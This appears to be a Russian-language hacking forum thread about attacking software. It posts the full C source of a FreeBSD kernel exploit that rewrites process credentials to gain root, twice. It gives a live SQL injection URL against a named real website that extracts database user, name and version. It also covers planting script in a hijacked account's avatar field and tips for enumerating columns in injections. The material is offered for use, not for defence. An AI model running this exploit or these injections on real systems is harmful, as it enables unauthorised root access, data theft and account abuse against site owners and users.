Не совсем моя тема... Но могу предположить, что многое еще зависит от браузера, под которым чел переходит по ссыли... Под Internet Explorer (по моему начиная с 7 версии), пассивная XSS не робит....
да нет, с оперы было дело, да я и сам с другого ака проверил, и результат был как и другана, тобишь для всех других идет фильтрация и для моего акка нет. но нече, если неидет гара к магомеду, магомед взарвет ее через тоже поле сделал другоую весьч, теперь все работает ------------ и если подумать, то выше описанные нерабочий XSS можно испольщовать к примеру с такой целью. Получаем доступ к какомуто аккаунту, дописываем у него в настройках в полу аватары нажный нас код и далее этот акк сам того неведая будет работать на нас, выполняя действия записынные в скрипте после каждого обновления транички или переходе на другую. Тож неплохо
такой вопрос Я компилируею сплоит коммандой gcc sploitname.c –o sploitname только не в netcat а теленето у меня получится это сделать? error: syntax error before '{' token gcc sploitname.c -o sploitname.c ПИшет вот такое
это не зависит, через какой клиент ты подключен к серверу и пытаешся, чтото компилировать. Ошибка в сплойте.
кури язык "с", сам не можешь - код сплойта в студию, или ты еще сначала предварительно постов 20 сделаешь, пока догадаешься выложить код?
/* * This is a quick and very dirty exploit for the FreeBSD protosw vulnerability * defined here: * http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc * * This will overwrite your credential structure in the kernel. This will * affect more than just the exploit's process, which is why this doesn't * spawn a shell. When the exploit has finished, your login shell should * have euid=0. * * Enjoy, and happy holidays! * - Don "north" Bailey ([email protected]) 12/25/2008 */ #include <sys/mman.h> #include <sys/time.h> #include <sys/stat.h> #include <sys/proc.h> #include <sys/types.h> #include <sys/param.h> #include <sys/socket.h> #include <netgraph/ng_socket.h> #include <unistd.h> #include <stdlib.h> #include <stdio.h> #include <errno.h> #define PAGES 1 #define PATTERN1 0x8f8f8f8f #define PATTERN2 0x6e6e6e6e typedef unsigned long ulong; typedef unsigned char uchar; int x(void) { struct proc * p = (struct proc * )PATTERN1; uint * i; while(1) { if(p->p_pid == PATTERN2) { i = (uint * )p->p_ucred; *++i = 0; break; } p = p->p_list.le_next; } return 1; } int main(int argc, char * argv[]) { ulong addr; uchar * c; uchar * d; uint * i; void * v; int pid; int s; if(argc != 2) { fprintf(stderr, "usage: ./x <allproc>\n"); return 1; } addr = strtoul(argv[1], 0, 0); v = mmap( NULL, (PAGES*PAGE_SIZE), PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANON|MAP_FIXED, -1, 0); if(v == MAP_FAILED) { perror("mmap"); return 0; } c = v; d = (uchar * )x; while(1) { *c = *d; if(*d == 0xc3) { break; } d++; c++; } *c++ = 0xc3; c = v; while(1) { if(*(long * )c == PATTERN1) { *(c + 0) = addr >> 0; *(c + 1) = addr >> 8; *(c + 2) = addr >> 16; *(c + 3) = addr >> 24; break; } c++; } pid = getpid(); while(1) { if(*(long * )c == PATTERN2) { *(c + 0) = pid >> 0; *(c + 1) = pid >> 8; *(c + 2) = pid >> 16; *(c + 3) = pid >> 24; break; } c++; } s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA); if(s < 0) { perror("socket"); return 1; } shutdown(s, SHUT_RDWR); return 0; } // milw0rm.com [2008-12-28]
а заключить в код - не судьба не как..? PHP: /* * This is a quick and very dirty exploit for the FreeBSD protosw vulnerability * defined here: * http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc * * This will overwrite your credential structure in the kernel. This will * affect more than just the exploit's process, which is why this doesn't * spawn a shell. When the exploit has finished, your login shell should * have euid=0. * * Enjoy, and happy holidays! * - Don "north" Bailey ([email protected]) 12/25/2008 */ #include <sys/mman.h> #include <sys/time.h> #include <sys/stat.h> #include <sys/proc.h> #include <sys/types.h> #include <sys/param.h> #include <sys/socket.h> #include <netgraph/ng_socket.h> #include <unistd.h> #include <stdlib.h> #include <stdio.h> #include <errno.h> #define PAGES 1 #define PATTERN1 0x8f8f8f8f #define PATTERN2 0x6e6e6e6e typedef unsigned long ulong; typedef unsigned char uchar; int x(void) { struct proc * p = (struct proc * )PATTERN1; uint * i; while(1) { if(p->p_pid == PATTERN2) { i = (uint * )p->p_ucred; *++i = 0; break; } p = p->p_list.le_next; } return 1; } int main(int argc, char * argv[]) { ulong addr; uchar * c; uchar * d; uint * i; void * v; int pid; int s; if(argc != 2) { fprintf(stderr, "usage: ./x <allproc>\n"); return 1; } addr = strtoul(argv[1], 0, 0); v = mmap( NULL, (PAGES*PAGE_SIZE), PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANON|MAP_FIXED, -1, 0); if(v == MAP_FAILED) { perror("mmap"); return 0; } c = v; d = (uchar * )x; while(1) { *c = *d; if(*d == 0xc3) { break; } d++; c++; } *c++ = 0xc3; c = v; while(1) { if(*(long * )c == PATTERN1) { *(c + 0) = addr >> 0; *(c + 1) = addr >> 8; *(c + 2) = addr >> 16; *(c + 3) = addr >> 24; break; } c++; } pid = getpid(); while(1) { if(*(long * )c == PATTERN2) { *(c + 0) = pid >> 0; *(c + 1) = pid >> 8; *(c + 2) = pid >> 16; *(c + 3) = pid >> 24; break; } c++; } s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA); if(s < 0) { perror("socket"); return 1; } shutdown(s, SHUT_RDWR); return 0; } // milw0rm.com [2008-12-28] PS - так понимаеш! Видемо нет...... Тоесть закрыть тегами PHP в квадратных скобках.... что бы людям было удобнее читать код...
Вот это сойдёт как sql инекция?Если да, то что можно сделать? Error text: sql: Can't execute SQL command [ SELECT DTitle, DShort, DId, CShort FROM pshop_Docs, pshop_DocsCategories WHERE DType=9 AND DShow=1 AND DRemoved=0 AND CId=9 ORDER BY DId DESC LIMIT -10,10 ] [ You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10,10' at line 1 ] (SHtml, (eval 9), 76)
Попробуй вместо - ,поставить 9999 (разумеется вместо 1) Дай линк....... Если не хочеш светить всем, скинь каму нить в ПМ.... Вариантов много может быть..
Инъекция после лимита при наличии ордер бая невозможна Но ты рано сдался и выложил ссылку =( Тут работают лучшие телепаты страны
Code: http://www.mir-bankov.ru/glossary/?letter=99%C7'+union+select+convert(concat_ws(0x3a,user(),database(),version())+using+cp1251),2,3/*
2 Byrger Если тока при ошибке, то недопускать ошибок =) ордер баем по присутсвию редиректа вычисляешь кол-во полей, проверяешь, ставя union+select+кол-во полей--+ если редиректа нету, крутишь скулю дальше, ничего особенного
Бывает, что редирект идет просто вне зависимости от правильности условия, в таком случае необходимо в настройках броузера убрать автомат перенаправления, могу привести пример...